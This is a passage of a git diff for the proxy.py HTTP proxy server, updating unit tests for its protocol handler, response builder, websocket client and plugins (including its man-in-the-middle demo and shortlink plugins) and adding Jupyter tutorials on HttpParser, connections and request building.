2) self.assertEqual( self.protocol_handler.work.connection, - self.mock_ssl_wrap.return_value, + client_tls_sock, ) # Assert connection references for all other plugins is updated - # self.assertEqual( - # self.plugin.return_value.client._conn, - # self.mock_ssl_wrap.return_value, - # ) self.assertEqual( self.proxy_plugin.return_value.client._conn, - self.mock_ssl_wrap.return_value, + client_tls_sock, ) + + # Now process the GET request + await self.protocol_handler._run_once() + self.plugin.assert_not_called() + self.proxy_plugin.assert_called_once() + + # Lifecycle callbacks still not invoked + self.proxy_plugin.return_value.handle_client_data.assert_not_called() + self.proxy_plugin.return_value.handle_upstream_chunk.assert_not_called() + self.proxy_plugin.return_value.on_upstream_connection_close.assert_not_called() + self.proxy_plugin.return_value.on_access_log.assert_not_called() + # Only handle client request lifecycle must be called again + self.proxy_plugin.return_value.resolve_dns.assert_called_once_with( + host, port, + ) + self.proxy_plugin.return_value.before_upstream_connection.assert_called() + self.assertEqual( + self.proxy_plugin.return_value.handle_client_request.call_count, + 2, + ) + self.proxy_plugin.return_value.do_intercept.assert_called_once() + + callback_request = \ + self.proxy_plugin.return_value.handle_client_request.call_args_list[1][0][0] + self.assertEqual(callback_request.host, None) + self.assertEqual(callback_request.port, 80) + self.assertEqual(callback_request.header(b'Host'), headers[b'Host']) + assert callback_request._url + self.assertEqual(callback_request._url.remainder, b'/') + self.assertEqual(callback_request.method, httpMethods.GET) + self.assertEqual(callback_request.is_https_tunnel, False) diff --git a/tests/http/test_protocol_handler.py b/tests/http/test_protocol_handler.py index a2425fd723..0ba0b44284 100644 --- a/tests/http/test_protocol_handler.py +++ b/tests/http/test_protocol_handler.py @@ -230,7 +230,7 @@ async def assert_tunnel_response( server.closed = False parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - parser.parse(self.protocol_handler.work.buffer[0].tobytes()) + parser.parse(self.protocol_handler.work.buffer[0]) self.assertEqual(parser.state, httpParserStates.COMPLETE) assert parser.code is not None self.assertEqual(int(parser.code), 200) @@ -456,7 +456,7 @@ async def assert_data_queued( CRLF, ]) server.queue.assert_called_once() - self.assertEqual(server.queue.call_args_list[0][0][0].tobytes(), pkt) + self.assertEqual(server.queue.call_args_list[0][0][0], pkt) server.buffer_size.return_value = len(pkt) async def assert_data_queued_to_server(self, server: mock.Mock) -> None: diff --git a/tests/http/test_responses.py b/tests/http/test_responses.py new file mode 100644 index 0000000000..36263a36d1 --- /dev/null +++ b/tests/http/test_responses.py @@ -0,0 +1,113 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. + + .. spelling:: + + nd +""" +import gzip + +import unittest + +from proxy.http.parser import ChunkParser +from proxy.http.responses import okResponse +from proxy.common.constants import CRLF + + +class TestResponses(unittest.TestCase): + + def test_basic(self) -> None: + self.assertEqual( + okResponse(), + b'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n', + ) + self.assertEqual( + okResponse( + headers={ + b'X-Custom-Header': b'my value', + }, + ), + b'HTTP/1.1 200 OK\r\nX-Custom-Header: my value\r\nContent-Length: 0\r\n\r\n', + ) + self.assertEqual( + okResponse( + content=b'Hello World', + headers={ + b'X-Custom-Header': b'my value', + }, + ), + b'HTTP/1.1 200 OK\r\nX-Custom-Header: my value\r\nContent-Length: 11\r\n\r\nHello World', + ) + + def test_compression(self) -> None: + content = b'H' * 21 + self.assertEqual( + gzip.decompress( + okResponse( + content=content, + headers={ + b'X-Custom-Header': b'my value', + }, + ).tobytes().split(CRLF + CRLF, maxsplit=1)[-1], + ), + content, + ) + self.assertEqual( + okResponse( + content=content, + headers={ + b'Host': b'jaxl.com', + }, + min_compression_length=len(content), + ), + b'HTTP/1.1 200 OK\r\nHost: jaxl.com\r\nContent-Length: 21\r\n\r\nHHHHHHHHHHHHHHHHHHHHH', + ) + + def test_close_header(self) -> None: + self.assertEqual( + okResponse( + content=b'Hello World', + headers={ + b'Host': b'jaxl.com', + }, + conn_close=True, + ), + b'HTTP/1.1 200 OK\r\nHost: jaxl.com\r\nContent-Length: 11\r\nConnection: close\r\n\r\nHello World', + ) + + def test_chunked_without_compression(self) -> None: + chunks = ChunkParser.to_chunks(b'Hello World', chunk_size=5) + self.assertEqual( + okResponse( + content=chunks, + headers={ + b'Transfer-Encoding': b'chunked', + }, + # Avoid compressing chunks for demo purposes here + # Ideally you should omit this flag and send + # compressed chunks. + min_compression_length=len(chunks), + ), + b'HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n5\r\nHello\r\n5\r\n Worl\r\n1\r\nd\r\n0\r\n\r\n', + ) + + def test_chunked_with_compression(self) -> None: + chunks = ChunkParser.to_chunks(b'Hello World', chunk_size=5) + self.assertEqual( + gzip.decompress( + okResponse( + content=chunks, + headers={ + b'Transfer-Encoding': b'chunked', + }, + ).tobytes().split(CRLF + CRLF, maxsplit=1)[-1], + ), + chunks, + ) diff --git a/tests/http/websocket/test_websocket_client.py b/tests/http/websocket/test_websocket_client.py index 4e31e48e30..92df52eb93 100644 --- a/tests/http/websocket/test_websocket_client.py +++ b/tests/http/websocket/test_websocket_client.py @@ -8,6 +8,8 @@ :copyright: (c) 2013-present by Abhinav Singh and contributors. :license: BSD, see LICENSE for more details. """ +import selectors + import unittest from unittest import mock @@ -15,18 +17,19 @@ build_websocket_handshake_request, build_websocket_handshake_response, ) from proxy.http.websocket import WebsocketFrame, WebsocketClient -from proxy.common.constants import DEFAULT_PORT +from proxy.common.constants import DEFAULT_PORT, DEFAULT_BUFFER_SIZE class TestWebsocketClient(unittest.TestCase): - @mock.patch('proxy.http.websocket.client.socket.gethostbyname') @mock.patch('base64.b64encode') + @mock.patch('proxy.http.websocket.client.socket.gethostbyname') @mock.patch('proxy.http.websocket.client.new_socket_connection') - def test_handshake( - self, mock_connect: mock.Mock, - mock_b64encode: mock.Mock, - mock_gethostbyname: mock.Mock, + def test_handshake_success( + self, + mock_connect: mock.Mock, + mock_gethostbyname: mock.Mock, + mock_b64encode: mock.Mock, ) -> None: key = b'MySecretKey' mock_b64encode.return_value = key @@ -35,9 +38,71 @@ def test_handshake( build_websocket_handshake_response( WebsocketFrame.key_to_accept(key), ) + mock_connect.assert_not_called() client = WebsocketClient(b'localhost', DEFAULT_PORT) + mock_connect.assert_called_once() mock_connect.return_value.send.assert_not_called() client.handshake() mock_connect.return_value.send.assert_called_with( build_websocket_handshake_request(key), ) + mock_connect.return_value.recv.assert_called_once_with( + DEFAULT_BUFFER_SIZE, + ) + + @mock.patch('base64.b64encode') + @mock.patch('selectors.DefaultSelector') + @mock.patch('proxy.http.websocket.client.new_socket_connection') + def test_send_recv_frames_success( + self, + mock_connect: mock.Mock, + mock_selector: mock.Mock, + mock_b64encode: mock.Mock, + ) -> None: + key = b'MySecretKey' + mock_b64encode.return_value = key + mock_connect.return_value.recv.side_effect = [ + build_websocket_handshake_response( + WebsocketFrame.key_to_accept(key), + ), + WebsocketFrame.text(b'world'), + ] + + def on_message(frame: WebsocketFrame) -> None: + assert frame.build() == WebsocketFrame.text(b'world') + + client = WebsocketClient( + b'localhost', DEFAULT_PORT, on_message=on_message, + ) + mock_selector.assert_called_once() + client.handshake() + client.queue(memoryview(WebsocketFrame.text(b'hello'))) + mock_connect.return_value.send.assert_called_once() + mock_selector.return_value.select.side_effect = [ + [ + (mock.Mock(), selectors.EVENT_WRITE), + ], + ] + client.run_once() + self.assertEqual(mock_connect.return_value.send.call_count, 2) + mock_selector.return_value.select.side_effect = [ + [ + (mock.Mock(), selectors.EVENT_READ), + ], + ] + client.run_once() + + @mock.patch('selectors.DefaultSelector') + @mock.patch('proxy.http.websocket.client.new_socket_connection') + def test_run( + self, + mock_connect: mock.Mock, + mock_selector: mock.Mock, + ) -> None: + mock_selector.return_value.select.side_effect = KeyboardInterrupt + client = WebsocketClient(b'localhost', DEFAULT_PORT) + client.run() + mock_connect.return_value.shutdown.assert_called_once() + mock_connect.return_value.close.assert_called_once() + mock_selector.return_value.unregister.assert_called_once_with(mock_connect.return_value) + mock_selector.return_value.close.assert_called_once() diff --git a/tests/plugin/test_http_proxy_plugins.py b/tests/plugin/test_http_proxy_plugins.py index 5b9e30d12f..1a04c288dd 100644 --- a/tests/plugin/test_http_proxy_plugins.py +++ b/tests/plugin/test_http_proxy_plugins.py @@ -28,6 +28,9 @@ from proxy.common.flag import FlagParser from proxy.http.parser import HttpParser, httpParserTypes from proxy.common.utils import bytes_, build_http_request, build_http_response +from proxy.http.responses import ( + NOT_FOUND_RESPONSE_PKT, PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT, +) from proxy.common.constants import DEFAULT_HTTP_PORT, PROXY_AGENT_HEADER_VALUE from .utils import get_plugin_by_test_name from ..test_assertions import Assertions @@ -90,6 +93,7 @@ async def test_modify_post_data_plugin(self) -> None: b'Content-Length': bytes_(len(original)), }, body=original, + no_ua=True, ) self.mock_selector.return_value.select.side_effect = [ [( @@ -117,6 +121,7 @@ async def test_modify_post_data_plugin(self) -> None: b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, }, body=modified, + no_ua=True, ), ) @@ -153,7 +158,7 @@ async def test_proposed_rest_api_plugin(self) -> None: self.mock_server_conn.assert_not_called() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( response.header(b'content-type'), @@ -186,6 +191,7 @@ async def test_redirect_to_custom_server_plugin(self) -> None: headers={ b'Host': b'example.org', }, + no_ua=True, ) self._conn.recv.return_value = request self.mock_selector.return_value.select.side_effect = [ @@ -212,9 +218,44 @@ async def test_redirect_to_custom_server_plugin(self) -> None: b'Host': upstream.netloc, b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, }, + no_ua=True, ), ) + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_redirect_to_custom_server_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_redirect_to_custom_server_plugin_skips_https(self) -> None: + request = build_http_request( + b'CONNECT', b'jaxl.com:443', + headers={ + b'Host': b'jaxl.com:443', + }, + ) + self._conn.recv.return_value = request + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + await self.protocol_handler._run_once() + self.mock_server_conn.assert_called_with('jaxl.com', 443) + self.assertEqual( + self.protocol_handler.work.buffer[0].tobytes(), + PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT, + ) + @pytest.mark.asyncio # type: ignore[misc] @pytest.mark.parametrize( "_setUp", @@ -246,7 +287,7 @@ async def test_filter_by_upstream_host_plugin(self) -> None: self.mock_server_conn.assert_not_called() self.assertEqual( - self.protocol_handler.work.buffer[0].tobytes(), + self.protocol_handler.work.buffer[0], build_http_response( status_code=httpStatusCodes.I_AM_A_TEAPOT, reason=b'I\'m a tea pot', @@ -268,6 +309,7 @@ async def test_man_in_the_middle_plugin(self) -> None: headers={ b'Host': b'super.secure', }, + no_ua=True, ) self._conn.recv.return_value = request @@ -326,8 +368,12 @@ def closed() -> bool: b'Host': b'super.secure', b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, }, + no_ua=True, ) - server.queue.assert_called_once_with(queued_request) + server.queue.assert_called_once() + print(server.queue.call_args_list[0][0][0].tobytes()) + print(queued_request) + self.assertEqual(server.queue.call_args_list[0][0][0], queued_request) # Server write await self.protocol_handler._run_once() @@ -342,7 +388,7 @@ def closed() -> bool: ) await self.protocol_handler._run_once() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( gzip.decompress(response.body), @@ -379,10 +425,129 @@ async def test_filter_by_url_regex_plugin(self) -> None: await self.protocol_handler._run_once() self.assertEqual( - self.protocol_handler.work.buffer[0].tobytes(), + self.protocol_handler.work.buffer[0], build_http_response( status_code=httpStatusCodes.NOT_FOUND, reason=b'Blocked', conn_close=True, ), ) + + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_shortlink_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_shortlink_plugin(self) -> None: + request = build_http_request( + b'GET', b'http://t/', + headers={ + b'Host': b't', + }, + ) + self._conn.recv.return_value = request + + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + + await self.protocol_handler._run_once() + self.assertEqual( + self.protocol_handler.work.buffer[0].tobytes(), + build_http_response( + status_code=httpStatusCodes.SEE_OTHER, + reason=b'See Other', + headers={ + b'Location': b'http://twitter.com/', + }, + conn_close=True, + ), + ) + + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_shortlink_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_shortlink_plugin_unknown(self) -> None: + request = build_http_request( + b'GET', b'http://unknown/', + headers={ + b'Host': b'unknown', + }, + ) + self._conn.recv.return_value = request + + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + await self.protocol_handler._run_once() + self.assertEqual( + self.protocol_handler.work.buffer[0].tobytes(), + NOT_FOUND_RESPONSE_PKT, + ) + + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_shortlink_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_shortlink_plugin_external(self) -> None: + request = build_http_request( + b'GET', b'http://jaxl.com/', + headers={ + b'Host': b'jaxl.com', + }, + no_ua=True, + ) + self._conn.recv.return_value = request + + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + await self.protocol_handler._run_once() + self.mock_server_conn.assert_called_once_with('jaxl.com', 80) + self.mock_server_conn.return_value.queue.assert_called_with( + build_http_request( + b'GET', b'/', + headers={ + b'Host': b'jaxl.com', + b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, + }, + no_ua=True, + ), + ) + self.assertFalse(self.protocol_handler.work.has_buffer()) diff --git a/tests/plugin/test_http_proxy_plugins_with_tls_interception.py b/tests/plugin/test_http_proxy_plugins_with_tls_interception.py index 77345a41d5..64dd9440f6 100644 --- a/tests/plugin/test_http_proxy_plugins_with_tls_interception.py +++ b/tests/plugin/test_http_proxy_plugins_with_tls_interception.py @@ -95,7 +95,9 @@ def mock_connection() -> Any: # Do not mock the original wrap method self.server.wrap.side_effect = \ - lambda x, y: TcpServerConnection.wrap(self.server, x, y) + lambda x, y, as_non_blocking: TcpServerConnection.wrap( + self.server, x, y, as_non_blocking=as_non_blocking, + ) self.server.has_buffer.side_effect = has_buffer type(self.server).closed = mocker.PropertyMock(side_effect=closed) @@ -150,7 +152,9 @@ def send(raw: bytes) -> int: self._conn.send.side_effect = send self._conn.recv.return_value = build_http_request( - httpMethods.CONNECT, b'uni.corn:443', + httpMethods.CONNECT, + b'uni.corn:443', + no_ua=True, ) @pytest.mark.asyncio # type: ignore[misc] @@ -191,6 +195,7 @@ async def test_modify_post_data_plugin(self) -> None: b'Content-Type': b'application/x-www-form-urlencoded', }, body=original, + no_ua=True, ) await self.protocol_handler._run_once() self.server.queue.assert_called_once() @@ -240,6 +245,7 @@ async def test_man_in_the_middle_plugin(self) -> None: headers={ b'Host': b'uni.corn', }, + no_ua=True, ) self.client_ssl_connection.recv.return_value = request @@ -257,7 +263,7 @@ async def test_man_in_the_middle_plugin(self) -> None: ) await self.protocol_handler._run_once() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( gzip.decompress(response.body), diff --git a/tests/plugin/utils.py b/tests/plugin/utils.py index 7e6335057d..400e874d53 100644 --- a/tests/plugin/utils.py +++ b/tests/plugin/utils.py @@ -11,9 +11,9 @@ from typing import Type from proxy.plugin import ( - CacheResponsesPlugin, ManInTheMiddlePlugin, ModifyPostDataPlugin, - ProposedRestApiPlugin, FilterByURLRegexPlugin, FilterByUpstreamHostPlugin, - RedirectToCustomServerPlugin, + ShortLinkPlugin, CacheResponsesPlugin, ManInTheMiddlePlugin, + ModifyPostDataPlugin, ProposedRestApiPlugin, FilterByURLRegexPlugin, + FilterByUpstreamHostPlugin, RedirectToCustomServerPlugin, ) from proxy.http.proxy import HttpProxyBasePlugin @@ -34,4 +34,6 @@ def get_plugin_by_test_name(test_name: str) -> Type[HttpProxyBasePlugin]: plugin = ManInTheMiddlePlugin elif test_name == 'test_filter_by_url_regex_plugin': plugin = FilterByURLRegexPlugin + elif test_name == 'test_shortlink_plugin': + plugin = ShortLinkPlugin return plugin diff --git a/tutorial/connections.ipynb b/tutorial/connections.ipynb new file mode 100644 index 0000000000..f2f52391a6 --- /dev/null +++ b/tutorial/connections.ipynb @@ -0,0 +1,130 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Connections\n", + "\n", + "## Buffered Socket Connections\n", + "\n", + "`proxy.py` core provides buffered socket implementations. In most of the cases, a buffered connection will be desired. With buffered connections, we can queue data from our application code while leaving the responsibility of flushing the buffer on the core.\n", + "\n", + "One of the buffered connection class is `TcpServerConnection`, which manages connection to an upstream server. Optionally, we can also enable encryption _(TLS)_ before communicating with the server.\n", + "\n", + "Import the following:" + ] + }, + { + "cell_type": "code", + "execution_count": 1, + "metadata": {}, + "outputs": [], + "source": [ + "from proxy.core.connection import TcpServerConnection\n", + "from proxy.common.utils import build_http_request\n", + "from proxy.http.methods import httpMethods\n", + "from proxy.http.parser import HttpParser, httpParserTypes\n", + "\n", + "request = build_http_request(\n", + " method=httpMethods.GET,\n", + " url=b'/',\n", + " headers={\n", + " b'Host': b'jaxl.com',\n", + " }\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Let's use `TcpServerConnection` to make a HTTP web server request." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "http_client = TcpServerConnection('jaxl.com', 80)\n", + "http_client.connect()\n", + "http_client.queue(memoryview(request))\n", + "http_client.flush()\n", + "\n", + "http_response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n", + "while not http_response.is_complete:\n", + " http_response.parse(http_client.recv())\n", + "http_client.close()\n", + "\n", + "print(http_response.build_response())\n", + "\n", + "assert http_response.is_complete\n", + "assert http_response.code == b'301'\n", + "assert http_response.reason == b'Moved Permanently'\n", + "assert http_response.has_header(b'location')\n", + "assert http_response.header(b'location') == b'https://jaxl.com/'" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Let's use `TcpServerConnection` to make a HTTPS web server request." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "https_client = TcpServerConnection('jaxl.com', 443)\n", + "https_client.connect()\n", + "https_client.wrap(hostname='jaxl.com')\n", + "\n", + "https_client.queue(memoryview(request))\n", + "https_client.flush()\n", + "\n", + "https_response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n", + "while not https_response.is_complete:\n", + " https_response.parse(https_client.recv())\n", + "https_client.close()\n", + "\n", + "print(https_response.build_response())\n", + "\n", + "assert https_response.is_complete\n", + "assert https_response.code == b'200'\n", + "assert https_response.reason == b'OK'\n", + "assert https_response.has_header(b'content-type')\n", + "assert https_response.header(b'content-type') == b'text/html'" + ] + } + ], + "metadata": { + "interpreter": { + "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7" + }, + "kernelspec": { + "display_name": "Python 3.10.0 64-bit ('venv310': venv)", + "language": "python", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.10.0" + }, + "orig_nbformat": 4 + }, + "nbformat": 4, + "nbformat_minor": 2 +} diff --git a/tutorial/http_parser.ipynb b/tutorial/http_parser.ipynb new file mode 100644 index 0000000000..d0800afc25 --- /dev/null +++ b/tutorial/http_parser.ipynb @@ -0,0 +1,182 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# HttpParser\n", + "\n", + "`HttpParser` class is at the heart of everything related to HTTP. It is used by Web server and Proxy server core and their plugin eco-system. As the name suggests, it is capable of parsing both HTTP request and response packets. It can also parse HTTP look-a-like protocols like ICAP, SIP etc. Most importantly, remember that `HttpParser` was originally written to handle HTTP packets arriving in the context of a proxy server and till date its default behavior favors the same flavor.\n", + "\n", + "Let's start by parsing a HTTP web request using `HttpParser`" + ] + }, + { + "cell_type": "code", + "execution_count": 1, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "from proxy.http.methods import httpMethods\n", + "from proxy.http.parser import HttpParser, httpParserTypes, httpParserStates\n", + "from proxy.common.constants import HTTP_1_1\n", + "\n", + "get_request = HttpParser(httpParserTypes.REQUEST_PARSER)\n", + "get_request.parse(b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n')\n", + "\n", + "print(get_request.build())\n", + "\n", + "assert get_request.is_complete\n", + "assert get_request.method == httpMethods.GET\n", + "assert get_request.version == HTTP_1_1\n", + "assert get_request.host == None\n", + "assert get_request.port == 80\n", + "assert get_request._url != None\n", + "assert get_request._url.remainder == b'/'\n", + "assert get_request.has_header(b'host')\n", + "assert get_request.header(b'host') == b'jaxl.com'\n", + "assert len(get_request.headers) == 1" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Next, let's parse a HTTP proxy request using `HttpParser`" + ] + }, + { + "cell_type": "code", + "execution_count": 2, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'\n", + "b'GET http://jaxl.com:80/ HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "proxy_request = HttpParser(httpParserTypes.REQUEST_PARSER)\n", + "proxy_request.parse(b'GET http://jaxl.com/ HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n')\n", + "\n", + "print(proxy_request.build())\n", + "print(proxy_request.build(for_proxy=True))\n", + "\n", + "assert proxy_request.is_complete\n", + "assert proxy_request.method == httpMethods.GET\n", + "assert proxy_request.version == HTTP_1_1\n", + "assert proxy_request.host == b'jaxl.com'\n", + "assert proxy_request.port == 80\n", + "assert proxy_request._url != None\n", + "assert proxy_request._url.remainder == b'/'\n", + "assert proxy_request.has_header(b'host')\n", + "assert proxy_request.header(b'host') == b'jaxl.com'\n", + "assert len(proxy_request.headers) == 1" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Notice how `proxy_request.build()` and `proxy_request.build(for_proxy=True)` behave. Also, notice how `proxy_request.host` field is populated for a HTTP proxy packet but not for the prior HTTP web request packet example.\n", + "\n", + "To conclude, let's parse a HTTPS proxy request" + ] + }, + { + "cell_type": "code", + "execution_count": 4, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'CONNECT / HTTP/1.1\\r\\nHost: jaxl.com:443\\r\\n\\r\\n'\n", + "b'CONNECT jaxl.com:443 HTTP/1.1\\r\\nHost: jaxl.com:443\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "connect_request = HttpParser(httpParserTypes.REQUEST_PARSER)\n", + "connect_request.parse(b'CONNECT jaxl.com:443 HTTP/1.1\\r\\nHost: jaxl.com:443\\r\\n\\r\\n')\n", + "\n", + "print(connect_request.build())\n", + "print(connect_request.build(for_proxy=True))\n", + "\n", + "assert connect_request.is_complete\n", + "assert connect_request.is_https_tunnel\n", + "assert connect_request.version == HTTP_1_1\n", + "assert connect_request.host == b'jaxl.com'\n", + "assert connect_request.port == 443\n", + "assert connect_request._url != None\n", + "assert connect_request._url.remainder == None\n", + "assert connect_request.has_header(b'host')\n", + "assert connect_request.header(b'host') == b'jaxl.com:443'\n", + "assert len(connect_request.headers) == 1" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "### Take Away\n", + "\n", + "- `host` and `port` attributes represent the `host:port` present in the HTTP packet request line. For comparison purposes, below are all the three request lines again. Notice how there is no `host:port` available only for the web server get request\n", + " | Request Type | Request Line |\n", + " | ------------------| ---------------- |\n", + " | `get_request` | `GET / HTTP/1.1` |\n", + " | `proxy_request` | `GET http://jaxl.com HTTP/1.1` |\n", + " | `connect_request` | `CONNECT jaxl.com:443 HTTP/1.1` |\n", + "- `_url` attribute is an instance of `Url` parser and contains parsed information about the URL found in the request line\n", + "\n", + "Few of the other handy properties within `HttpParser` are:\n", + "\n", + "- `is_complete`\n", + "- `is_http_1_1_keep_alive`\n", + "- `is_connection_upgrade`\n", + "- `is_https_tunnel`\n", + "- `is_chunked_encoded`\n", + "- `content_expected`\n", + "- `body_expected`" + ] + } + ], + "metadata": { + "interpreter": { + "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7" + }, + "kernelspec": { + "display_name": "Python 3.10.0 64-bit ('venv310': venv)", + "language": "python", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.10.0" + }, + "orig_nbformat": 4 + }, + "nbformat": 4, + "nbformat_minor": 2 +} diff --git a/tutorial/requests.ipynb b/tutorial/requests.ipynb new file mode 100644 index 0000000000..fb2cc36393 --- /dev/null +++ b/tutorial/requests.ipynb @@ -0,0 +1,273 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Http Requests\n", + "\n", + "## Usage\n", + "\n", + "To construct a HTTP request packet you have a variety of facilities available.\n", + "\n", + "Previously we saw how to parse HTTP responses using `HttpParser`. We also saw how `HttpParser` class is capable of parsing various type of HTTP protocols. Remember the _take away_ from that tutorial." + ] + }, + { + "cell_type": "code", + "execution_count": 1, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "from proxy.http.parser import HttpParser, httpParserTypes\n", + "from proxy.http import httpMethods\n", + "from proxy.common.utils import HTTP_1_1\n", + "\n", + "request = HttpParser(httpParserTypes.REQUEST_PARSER)\n", + "request.path, request.method, request.version = b'/', httpMethods.GET, HTTP_1_1\n", + "request.add_header(b'Host', b'jaxl.com')\n", + "\n", + "print(request.build())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "But, this is a painful way to construct request packets. Hence, other high level abstractions are available.\n", + "\n", + "Example, following one liner will give us the same request packet." + ] + }, + { + "cell_type": "code", + "execution_count": 2, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\n\\r\\n'" + ] + }, + "execution_count": 2, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "from proxy.common.utils import build_http_request\n", + "\n", + "build_http_request(\n", + " method=httpMethods.GET,\n", + " url=b'/',\n", + " headers={b'Host': b'jaxl.com'},\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "`build_http_request` ensures a `User-Agent` header. You can provide your own too:" + ] + }, + { + "cell_type": "code", + "execution_count": 3, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: my app v1\\r\\n\\r\\n'" + ] + }, + "execution_count": 3, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "build_http_request(\n", + " method=httpMethods.GET,\n", + " url=b'/',\n", + " headers={\n", + " b'Host': b'jaxl.com',\n", + " b'User-Agent': b'my app v1'\n", + " },\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Or, if you don't want a `User-Agent` header at all" + ] + }, + { + "cell_type": "code", + "execution_count": 4, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'" + ] + }, + "execution_count": 4, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "build_http_request(\n", + " method=httpMethods.GET,\n", + " url=b'/',\n", + " headers={b'Host': b'jaxl.com'},\n", + " no_ua=True,\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "To add 